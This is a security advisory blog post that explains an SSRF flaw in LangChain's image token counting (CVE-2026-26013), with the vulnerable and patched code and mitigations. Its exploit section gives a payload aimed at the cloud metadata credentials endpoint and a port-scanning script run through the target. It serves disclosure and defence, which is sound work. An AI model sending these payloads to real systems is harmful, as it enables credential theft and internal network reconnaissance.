CVE-2026-26013: When Your AI Assistant Browses Your Intranet
Feb 11, 2026 · 6 min read
Executive Summary (TL;DR)
LangChain's `ChatOpenAI` component contained an SSRF vulnerability in its token counting logic. To estimate costs for vision models, the library automatically fetched images from URLs provided in prompts. This allowed attackers to force the server to request internal resources (like AWS metadata or localhost). Fixed in `langchain-core` 1.2.11.
In the race to build the ultimate AI agent, developers often overlook the plumbing. CVE-2026-26013 is a classic Server-Side Request Forgery (SSRF) vulnerability nestled deep within LangChain's utility functions. Specifically, the logic used to calculate token costs for OpenAI's vision models inadvertently turned the library into an open proxy. By tricking the `ChatOpenAI` component into 'measuring' an image hosted on an internal server, attackers could force the application to scan local networks or ping cloud metadata services. It’s a stark reminder that even 'helper' functions need to treat user input like a biological hazard.
The Hook: The Price of Pixels
In the modern LLM economy, tokens are currency. Developers are obsessed with counting them before sending requests to OpenAI to avoid bankruptcy. Text is easy—just count the subwords. But images? Images are tricky.
OpenAI's GPT-4o and GPT-4-turbo vision models price images based on their dimensions. A 512x512 image costs fewer tokens than a 2048x2048 one. To help developers estimate these costs locally, LangChain introduced a convenience method: `get_num_tokens_from_messages()`.
Here is the logic: If a user sends a prompt with an image URL, LangChain grabs the image, checks the height and width, and calculates the token cost. It sounds helpful, benign even. But from a security perspective, it's a nightmare. The library was effectively saying, "Give me a URL, and I will make a server-side HTTP request to it." In the security world, we call this a 'feature' right up until it becomes a CVE.
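To ground that, here is a minimal sketch of the intended, benign usage; the model name and image URL are placeholders:

```python
from langchain_core.messages import HumanMessage
from langchain_openai import ChatOpenAI

chat = ChatOpenAI(model="gpt-4o")

messages = [
    HumanMessage(
        content=[
            {"type": "text", "text": "What's in this picture?"},
            {"type": "image_url", "image_url": {"url": "https://example.com/photo.png"}},
        ]
    )
]

# Estimate the prompt cost locally. In affected versions, this call
# fetches the image over HTTP to measure its dimensions.
token_count = chat.get_num_tokens_from_messages(messages)
```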
The Flaw: Blind Trust
The vulnerability (CWE-918) stems from a lack of boundary checks in the `_url_to_size` helper function. When you pass a message history to the token counter, LangChain iterates through it. If it spots a `type: image_url` entry, it extracts the URL and immediately fires an HTTP GET request.
There was no whitelist. There was no blacklist. There was no check to see if the IP resolved to 127.0.0.1 or the infamous 169.254.169.254 (cloud metadata). The code assumed that if you are asking to count tokens for an image, you must be pointing to a valid, public image.
This is a classic blind SSRF scenario. While the attacker might not get the content of the response back (because the code tries to parse the response as an image using Pillow), the side effects are dangerous enough. The server performs the handshake, sends the headers, and downloads the body. This allows an attacker to map internal ports (based on response time), trigger internal APIs that act on GET requests, or perform Denial of Service by pointing the tokenizer at a 10GB file.
The Code: Autopsy of a Request
Let's look at the vulnerable code path in `libs/partners/openai/langchain_openai/chat_models/base.py`. The logic was devastatingly simple: it used `httpx` to fetch the resource without hesitation.
Vulnerable Implementation:

```python
import httpx
from io import BytesIO
from PIL import Image

def _url_to_size(image_source: str) -> tuple[int, int] | None:
    # No validation. Just fetch whatever URL the message contains.
    response = httpx.get(image_source)
    response.raise_for_status()
    # Pass the raw bytes to Pillow to get the image dimensions
    return Image.open(BytesIO(response.content)).size
```

The fix, introduced in commit 2b4b1dc29a833d4053deba4c2b77a3848c834565, is a lesson in defensive programming. The maintainers didn't just add a regex; they introduced a dedicated security module, `langchain_core._security._ssrf_protection`.
Fixed Implementation:

```python
from io import BytesIO

import httpx
from PIL import Image

from langchain_core._security._ssrf_protection import validate_safe_url

def _url_to_size(image_source: str) -> tuple[int, int] | None:
    try:
        # 1. Validate the URL before opening a connection
        validate_safe_url(image_source, allow_private=False, allow_http=True)
        # 2. Add a timeout to prevent hanging on slow endpoints
        with httpx.Client(timeout=5.0) as client:
            response = client.get(image_source)
        # 3. Check content size (50MB limit matching OpenAI)
        # ... (size checks) ...
        return Image.open(BytesIO(response.content)).size
    except (ValueError, httpx.RequestError):
        return None
```

The `validate_safe_url` function does the heavy lifting: it resolves the DNS name (preventing DNS rebinding attacks) and checks whether the resulting IP falls into private ranges (RFC 1918) or loopback addresses.
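The patch's internals aren't reproduced here, but a minimal sketch of that kind of guard, built only on the standard library, might look like the following. The function name and fail-closed behavior are illustrative assumptions, not LangChain's actual code:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def validate_safe_url_sketch(url: str) -> None:
    """Illustrative approximation of an SSRF guard; not LangChain's code."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("unsupported scheme")
    host = parsed.hostname
    if host is None:
        raise ValueError("missing host")
    # Resolve DNS once. A production guard must pin this resolved IP for
    # the actual request, or an attacker can win via DNS rebinding.
    try:
        resolved = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError) as exc:
        raise ValueError(f"cannot resolve {host!r}") from exc
    # is_link_local catches 169.254.169.254, the cloud metadata address
    if resolved.is_private or resolved.is_loopback or resolved.is_link_local:
        raise ValueError(f"{resolved} is not publicly routable")
```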
The Exploit: Poking the Bear
Exploiting this requires an application that allows user-controlled message history or uses an agent that processes external content. Imagine a "Receipt Scanner AI" that accepts image URLs.
The Attack Vector:

- Reconnaissance: The attacker identifies that the backend is using LangChain by analyzing error messages or behavior (e.g., precise token counts returned in debug logs).
- Payload Construction: The attacker crafts a request pretending to provide an image, but actually pointing to the AWS metadata service:

  ```json
  {
    "messages": [
      {
        "role": "user",
        "content": [
          {"type": "text", "text": "Analyze this receipt"},
          {
            "type": "image_url",
            "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
          }
        ]
      }
    ]
  }
  ```

- Trigger: The application calls `chat.get_num_tokens_from_messages(messages)` to check if the prompt fits the context window.
- Execution: LangChain sends a GET request to the metadata IP.
- Result:
  - Best Case (for Attacker): The application throws an error containing the response body: `Error: cannot identify image file <AWS_CREDENTIALS_BLOB>`. This leaks the credentials directly.
  - Blind Case: The application simply errors out or hangs. The attacker repeats this with different ports (`localhost:22`, `localhost:5432`) to map the internal network topology based on response latency; a probe sketch follows this list.
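For the blind case, the probe itself is trivial. The loop below is a hypothetical attacker-side sketch; the endpoint URL and request shape are assumptions about an application that exposes the vulnerable token counter:

```python
import time

import httpx

# Hypothetical target endpoint that passes user messages to the counter
TARGET = "https://victim.example.com/api/count-tokens"

for port in (22, 80, 5432, 6379):
    payload = {
        "messages": [{
            "role": "user",
            "content": [{
                "type": "image_url",
                "image_url": {"url": f"http://localhost:{port}/"},
            }],
        }]
    }
    start = time.monotonic()
    try:
        httpx.post(TARGET, json=payload, timeout=15.0)
    except httpx.RequestError:
        pass
    elapsed = time.monotonic() - start
    # A fast error usually means the port answered (open); hitting the
    # timeout suggests a filtered port or a hanging service.
    print(f"port {port}: {elapsed:.2f}s")
```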
The Impact: Why Low Severity Still Hurts
The CVSS score is 3.7 (Low) primarily because the Confidentiality impact is rated None/Low depending on the specific implementation. Since the function expects an image, it usually discards non-image data (like JSON from a metadata service) before the attacker sees it.
However, do not let the "Low" severity fool you. In a cloud environment, SSRF is a gateway drug. If an attacker can trigger requests from your backend, they can:
- Bypass Firewalls: Access internal admin panels (e.g., Jenkins, Kubernetes API) that are whitelisted for the server's IP.
- Cloud Enumeration: Even blind SSRF can confirm the existence of specific IAM roles or instance configurations.
- Denial of Service: By pointing the URL to a resource that returns an infinite stream of data (like `/dev/urandom` exposed over HTTP), they can exhaust the memory of the Python process attempting to load it into `BytesIO` (see the bounded-fetch sketch below).
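A generic defense against that last vector is to stream the response and abort once it exceeds a cap. This is an illustrative sketch, not the patch's actual size-check code; the 50MB figure merely mirrors the limit mentioned earlier:

```python
import httpx

MAX_BYTES = 50 * 1024 * 1024  # mirrors the 50MB cap cited above (assumption)

def bounded_fetch(url: str) -> bytes:
    """Stream the body and bail out early so an endless response
    (e.g., /dev/urandom over HTTP) cannot exhaust process memory."""
    buf = bytearray()
    with httpx.stream("GET", url, timeout=5.0) as response:
        response.raise_for_status()
        for chunk in response.iter_bytes():
            buf.extend(chunk)
            if len(buf) > MAX_BYTES:
                raise ValueError("response exceeded size limit")
    return bytes(buf)
```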
The Fix: Locking Down the Library
Remediation is straightforward but urgent. You must update `langchain-core` to version 1.2.11 or higher. The patch includes robust SSRF protections that are enabled by default.
If you cannot upgrade immediately, or if you are paranoid (which you should be), you can disable this behavior entirely in your code:
```python
# Explicitly disable image fetching during token counting
token_count = chat.get_num_tokens_from_messages(
    messages,
    allow_fetching_images=False,
)
```

This flag forces LangChain to skip the download and use a default/fallback calculation for token usage, preventing the network request altogether. It makes your token counts slightly less accurate for images, but it keeps your internal network private. A worthy trade-off.
Technical Appendix
CVSS Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L`

Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| `langchain-core` (LangChain AI) | < 1.2.11 | 1.2.11 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-918 |
| Attack Vector | Network |
| CVSS v3.1 | 3.7 (Low) |
| Impact | Blind SSRF, Internal Scanning |
| Vulnerable Method | `get_num_tokens_from_messages` |
| Fix Commit | `2b4b1dc29a833d4053deba4c2b77a3848c834565` |
MITRE ATT&CK Mapping
Server-Side Request Forgery (SSRF) occurs when a web application fetches a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application into sending a crafted request to an unexpected destination.